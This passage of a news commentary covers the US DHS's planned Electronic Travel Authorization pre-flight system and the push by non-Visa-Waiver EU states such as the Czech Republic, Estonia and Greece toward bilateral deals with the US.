We covered this some months ago. Essentially the DHS intends to introduce a 'clear to fly' pre-authorisation system whereby would-be travellers submit their details online prior to buying a ticket. This, the Electronic Travel Authorization (ETA) system, is described by the DHS as a continuation of the VWP, but could just as readily (although less photogenically) be described as online visas for all. Brussels doesn't actually oppose it because it wants to play too, and just last month EU Justice Commissioner Franco Frattini reiterated this, calling on the EU and the US to work together to set up a compatible system.

Brussels, however, has been ineffectual when it comes to getting the non-VWP EU states into the VWP, allowing the DHS to sell ETA to these as a massive convenience, even a liberalisation. As Czech deputy prime minister Alexandr Vondra told the Guardian: "There was no help, no solidarity in the past. It's in our interest to move ahead. We can't just wait and do nothing. We have to act in the interest of our citizens."

Richard Barth from the DHS visited Prague last week, and generally positive local reports viewed a bilateral agreement as a near certainty. Other non-VWP states thought likely to jump include Estonia and Greece